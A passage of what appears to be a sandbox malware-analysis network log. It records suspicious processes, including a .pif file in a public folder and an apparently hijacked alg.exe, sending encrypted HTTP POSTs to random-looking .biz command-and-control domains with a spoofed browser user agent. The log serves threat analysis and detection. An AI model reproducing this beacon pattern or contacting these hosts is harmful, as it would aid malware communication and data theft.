                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:16.846225023 CET349OUTPOST /dona HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: sxmiywsfv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:16.846240044 CET802OUTData Raw: 6c 7f 8e 79 a3 d0 f8 62 16 03 00 00 1a 18 6c 08 cf ac 0a 08 e4 1f bc 3b aa 96 74 7a ee 8a 3f f5 a1 79 79 a3 15 ba 50 c8 88 02 e4 57 af 68 a7 66 90 d4 59 d5 be f5 91 ca 6e f2 84 0b 0a fa 51 ab 61 1d db 16 e9 85 8d 60 95 e6 af ca 06 0a 0c 6c 43 42
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: lybl;tz?yyPWhfYnQa`lCBa?5=K%at*&kK =jo>fCn6s\X>n@*zJQTN:N#gFA1@~<K ]gP_O5dXu?7
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:18.288188934 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:18 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=fce488f59759cde4eb705c5405004dc7|173.254.250.82|1730445858|1730445858|0|1|0; path=/; domain=.sxmiywsfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        71192.168.2.849787165.160.15.20804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:16.998948097 CET352OUTPOST /qylgmshijgs HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: myups.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:16.998982906 CET778OUTData Raw: 46 f0 ae 76 87 c6 a6 5b fe 02 00 00 a7 8d 6d c7 a8 ad ec b8 a7 e1 e4 c2 ca 33 a4 d0 77 4e 7f 9c 72 46 7f 2e d1 1a 41 da c2 0b c1 c9 f5 d7 1a bf ae 88 2e 50 11 34 52 6d fe 37 1a d4 9e d1 7c 59 0b 54 e7 f9 fd 1e d6 22 ce fd 1f 79 7e fb 5b c5 30 e5
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Fv[m3wNrF.A.P4Rm7|YT"y~[0m1aLRlt#,kPA{225qeRr}R+4e$JKa;TI'_3D[8T~H5+c>Q[q {^IKT\U"^7',U#yoKH$]{S=;
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:17.694458008 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:17 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 94
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:17.816380978 CET344OUTPOST /nur HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: myups.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:17.816416979 CET778OUTData Raw: d6 50 1c 3e ba 4a 7c 74 fe 02 00 00 04 3a 8c 68 44 0b 3c 6f 50 03 f8 02 eb 73 a5 0e 6f 3e b7 b4 88 2a 48 21 af 81 be c6 9f 86 af 64 94 1f c7 e3 ee e1 8c 3b 82 cb 83 04 cf bc fe 68 87 82 a7 22 f8 b0 6f a6 1c b7 ae 97 de ec 78 bb 2b ba bc f8 69 01
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: P>J|t:hD<oPso>*H!d;h"ox+ii5-BciD#|*jey 6I?4jlA1N_}PpIS[LHQx~=hVCI ,mV+.![Y$jE_u)`,!HF\FA
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:17.992285967 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:17 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 94
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        72192.168.2.84978854.244.188.177804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:18.142719030 CET356OUTPOST /wveyxjtgsxs HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: oshhkdluh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:18.142733097 CET778OUTData Raw: 68 be cc 26 7d 73 0b 8b fe 02 00 00 9b ea 27 dc fc 51 33 e5 4c 1b a7 94 11 e8 31 e6 4a df ce e4 9a e7 b0 03 37 af 0e 4d fb af dd 2d 23 26 8c a2 46 0f ca 93 a8 1b 7e 10 20 ec 39 90 65 e8 9b 6d 68 f5 71 1b 5e 8b 48 1b 74 c1 6d 08 5a ee 80 6d 67 62
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: h&}s'Q3L1J7M-#&F~ 9emhq^HtmZmgb=,;+<S^C`l28u'gIU|X~)7l\S8D[0u7m)/T1_Z<(VlB\f{g+~Icfz(hJ=HVQds_
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:18.998892069 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:18 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=bd79a56d0c44f8ef144d739ce3c83a46|173.254.250.82|1730445858|1730445858|0|1|0; path=/; domain=.oshhkdluh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        73192.168.2.84978934.211.97.45804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:18.331059933 CET350OUTPOST /klflkg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: vrrazpdh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:18.331089020 CET802OUTData Raw: c5 26 4b f1 ee 9b 58 c6 16 03 00 00 bd 56 09 7e 0d 42 57 02 31 b5 f4 ee de 30 55 a6 90 c4 d1 20 28 9d 85 99 d8 c0 b8 5b e2 df a2 f6 cf 05 22 c5 d5 e0 98 eb ad f2 f6 6a d9 11 e0 1d 63 57 a3 ca 65 6a 42 3f c1 e5 31 f5 43 70 19 3c f1 17 a9 7f 74 e4
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: &KXV~BW10U (["jcWejB?1Cp<tQ*N'_tw7SLqT=]RO\tt30<YEXY7'8>efib5m{Y6*&[#`b6"KWA@()`?KK[6/}cB+H;%IBt


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        74192.168.2.84979034.211.97.45804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:19.070873976 CET356OUTPOST /cisadtlsyrfn HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: vrrazpdh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:19.070909023 CET802OUTData Raw: fb 3b c2 c9 91 90 bf 20 16 03 00 00 00 02 a0 b2 38 18 75 48 ad 97 2b 05 1a 99 e3 d4 bb 09 e5 63 18 ce 94 b1 51 8d 38 f0 61 98 95 0c d4 bd d3 a9 52 22 1f 4d 03 2a 09 84 1a c9 5c 26 1f dd 0b c6 f5 04 38 f9 18 9c 63 5b 9d 9f 8a f1 09 07 58 e7 e9 1c
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ; 8uH+cQ8aR"M*\&8c[Xzc0Ph8wGFCe*D_ci"@*Mni8(tUrFO'`IL"DIEK@_Hek`yFF|MO&?JT{@^.
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:19.911938906 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:19 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=be122e45ecf6c53c17f9ad2968cbf282|173.254.250.82|1730445859|1730445859|0|1|0; path=/; domain=.vrrazpdh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        75192.168.2.849791208.100.26.245804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:19.567832947 CET344OUTPOST /y HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: yunalwv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:19.574242115 CET778OUTData Raw: 6f a2 07 4b d8 18 ce b5 fe 02 00 00 fb b2 ac f0 31 d7 4e d9 89 1d e0 cf 57 9f 2c c2 1c c4 7a 6c 4f 6b cc f7 c8 16 da 65 8d 36 9c 0f 6f 25 48 bc be ee 66 e6 72 36 cd 7b a7 9f a8 cd 8f 6c 7a 0c fe 2c eb de 4b 1c f9 e3 c5 d6 ac f0 26 83 b2 0e 35 a8
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: oK1NW,zlOke6o%Hfr6{lz,K&5RVD3gqD:('EoZ'/N[e9_0.:GQ47T$G%YcM-9[;I=FA'7%hGzV*{LP88@9e^Wb":7
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:20.213001966 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:20 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:20.263045073 CET356OUTPOST /cjqgdtkxtfqqm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: yunalwv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:20.263072968 CET778OUTData Raw: cc 54 f5 53 a9 c4 c9 a9 fe 02 00 00 af 81 34 f1 e5 0a ad cf e2 3e 82 c5 73 15 1a 3b 7a 6c 0d 94 09 eb 90 e7 6e 4b fa c8 c0 af a4 b9 9e 19 fb 0e 89 bd 68 b5 57 33 51 61 0d 9f a4 be dd 26 82 85 17 ff b0 29 28 04 7b 50 df 83 a5 40 6a 88 e4 3e 92 17
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: TS4>s;zlnKhW3Qa&)({P@j>fAq!k _abToKn5DD6:<q$N0F/SgjHrMN1_9#DHo0mB`it0+
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:20.410424948 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:20 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        76192.168.2.84979247.129.31.212804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:19.964059114 CET350OUTPOST /xymnprgj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: ftxlah.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:19.964102983 CET802OUTData Raw: 4b 42 f4 c8 82 e4 7c 2c 16 03 00 00 dc 30 1b e7 59 33 77 bb 32 66 02 14 3a 2f 34 81 61 80 3b 96 b8 ed 6d 81 4a 22 8d 89 a9 5a 3c 2b b3 9c 72 d2 62 ef c8 bb 17 c2 95 05 96 52 70 f2 89 d4 26 db d2 00 37 ec fe f5 21 7e 06 ac 03 4e b5 06 ff 13 a4 06
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: KB|,0Y3w2f:/4a;mJ"Z<+rbRp&7!~N#w}{C!5CXK~%<8jR,z_#r0P=c!DeUtc3<J\`s{y.w_=<`<
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:21.432513952 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:21 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=d517416f8a2c7e0857a3113cd763f27b|173.254.250.82|1730445861|1730445861|0|1|0; path=/; domain=.ftxlah.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        77192.168.2.84979334.211.97.45804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:20.546741962 CET352OUTPOST /hmiutucdfnn HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: jpskm.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:20.546741962 CET778OUTData Raw: ad ca 0a 71 f5 b2 51 df fe 02 00 00 ad 0e ee 8d 76 19 43 5f 48 96 4c e0 d9 bf 4b f0 72 87 6c 46 fb 9e 83 bb be 3b 43 8b 31 57 2b 9c d0 cd df d4 f3 b3 17 02 ce 22 72 fd a1 64 88 88 eb 96 6e e8 37 4b a1 f0 12 c2 e5 bf 05 4c 8d 03 01 38 b5 99 d3 b4
